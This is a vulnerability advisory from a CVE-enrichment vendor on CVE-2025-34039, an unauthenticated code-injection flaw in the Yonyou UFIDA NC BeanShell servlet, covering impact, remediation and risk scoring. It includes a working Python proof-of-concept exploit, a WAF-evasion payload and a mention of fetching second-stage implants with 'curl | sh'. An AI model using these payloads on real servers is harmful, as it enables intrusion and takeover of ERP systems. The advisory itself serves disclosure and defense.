TL;DR
Any HTTP client that reaches/servlet/~ic/bsh.servlet.BshServleton Yonyou UFIDA NC through 6.5 can send absh.scriptparameter with arbitrary Java. Because the application server runs under a privileged account in many on-premise ERP installs, successful exploitation often leads to full system compromise. A patch is available, and administrators who cannot upgrade should remove the servlet or block the path at the reverse proxy.
1. Summary
| CVE ID | CVE-2025-34039 |
| Affected Product(s) | Yonyou UFIDA NC ≤ 6.5 when the BeanShell test servlet is reachable |
| Volerion Risk Score | 7.5 / 10 |
| Exploit Status | Public PoC available |
| CISA KEV | No |
The vulnerability is a classic case of test code left in production. Yonyou ships the third-party BeanShell JAR, which exposes a servlet intended for interactive debugging. Because the servlet accepts a text field containing Java and returns the output, any internet-facing deployment becomes an easy target for initial access.
2. Context – why an ERP bug matters beyond accounting
Yonyou UFIDA NC is a flagship enterprise-resource-planning platform in Asia-Pacific. Customers integrate it with payroll, inventory and sometimes industrial control systems. When the application runs on-premise, administrators often assign it a dedicated Windows or Linux server and open HTTP/HTTPS so branch offices can connect. In practice that means the ERP host sits one firewall hop away from sensitive databases. A remote code execution flaw therefore offers attackers a fast lane to financial records and cached credentials.
Although the affected servlet belongs to the open-source BeanShell interpreter, the actual risk is amplified by the UFIDA NC deployment model. Installers run the JBoss-based application server as root (Linux) or SYSTEM (Windows) unless the operator manually lowers privileges. Once an attacker executes Java, they can spawn native commands or use reflection to disable security controls.
3. Technical Details – turning a help page into a reverse shell
The vulnerable endpoint lives at /servlet/~ic/bsh.servlet.BshServlet. It wires directly into BeanShell’s Interpreter.eval() without any authentication check. The servlet expects either a POST form field or GET parameter named bsh.script. Whatever text appears inside that parameter becomes part of the Java runtime.
A minimal exploit uses a single HTTP request. The following example opens a calculator on Windows, proving arbitrary command execution.
# Exploit for CVE-2025-34039
import requests, sys, urllib.parse
target = sys.argv[1] # http://example.com:8080
payload = 'exec("calc.exe");' # Replace with bash commands on Linux
url = f"{target}/servlet/~ic/bsh.servlet.BshServlet"
data = {'bsh.script': payload}
r = requests.post(url, data=data, timeout=5)
print("Status:", r.status_code)
print("Response:", r.text[:200])The interpreter runs in the same JVM as UFIDA NC, so using Runtime.getRuntime().exec() or BeanShell’s exec() helper spawns processes with the server user’s privileges. Attackers often chain the bug by retrieving a second-stage implant over HTTP and launching it with curl | sh or PowerShell.
Why WAF rules rarely help
BeanShell accepts both Java expressions and full class definitions. An attacker can break any naïve regular-expression filter by embedding whitespace, comments or string concatenation. For example, ex/*foo*/ec("whoami") passes most generic RCE signatures yet evaluates correctly.
4. Impact – from ERP compromise to domain admin
Successful exploitation gives code execution inside the corporate ERP server. Typical attack paths include dumping stored database credentials from configuration files, installing web shells under the UFIDA deployment directory or pivoting to the domain controller via pass-the-hash if the server uses an elevated service account. In manufacturing environments the ERP suite sometimes interfaces directly with programmable logic controllers, opening the door to operational disruption.
Because exploitation requires only a single HTTP request and no authentication, mass scanning is trivial. The low EPSS of 0.00398 likely reflects limited global deployment, not technical difficulty.
5. Remediation – how to close the hole today
The safest option is to apply the vendor patch published through Yonyou’s UMC portal. The patch removes or guards the BeanShell servlet. Administrators should verify that ${NC_HOME}/modules/bshtest.jar is removed after the update.
If immediate patching is impossible:
- Block access to
/servlet/~ic/bsh.servlet.BshServletat the reverse proxy or web server. - Delete the BeanShell JARs (
bsh-*.jar) and restart the application server. - Run UFIDA NC under a dedicated low-privilege account to limit post-exploitation damage.
Routine penetration tests should include a check for the servlet because administrators sometimes restore it during upgrades.
6. Timeline
| Date (UTC) | Milestone |
|---|---|
| 2025-06-23 | CVE-2025-34039 published |
| 2025-06-23 | Volerion completes enrichment and publishes risk score |
7. References
- VulnCheck advisory – Yonyou UFIDA NC BeanShell Code Injection: https://vulncheck.com/advisories/yonyou-ufida-nc-beanshell-code-injection
- CNBlogs technical write-up and exploit: https://www.cnblogs.com/pursue-security/p/17685141.html
- CNVD entry CNVD-2021-30167: https://www.cnvd.org.cn/flaw/show/CNVD-2021-30167
- Official patch download (login required): http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
About Volerion
Volerion delivers AI-driven enrichment minutes after a CVE goes live. A single call to our REST API returns CVSS 4.0 vectors, exploitability metrics and affected products complete with remediation. Additionally, we offer different scoring profiles, complete with insight into the eight comprehensive categories that make up the final score. Our API is also available in the tradditional NVD API 2.0 format, so integration is as simple as swapping hosts. Spend less time parsing CVEs and more time closing them.
How the Volerion Risk Score Fits With CVSS, EPSS and KEV
At the time of writing:
- This CVE is scored at 10.0 using CVSS 3.1, which reflects maximum impact and minimal attacker effort. CVSS is useful for understanding technical severity but does not factor in real-world exploitation likelihood.
- EPSS assigns a score of 0.00398, suggesting a low probability that the vulnerability will be exploited within the next 30 days. The score is influenced by deployment scale rather than difficulty.
- CISA’s KEV list does not include the issue, meaning federal agencies are not under a binding directive to patch.
The Volerion Risk Score brings these signals together and layers them with additional factors such as affected product prevalence, exploit maturity and remediation effort. For CVE-2025-34039 the score is 7.5, landing in our high-risk band because the vulnerability allows unauthenticated RCE even though global deployment is limited.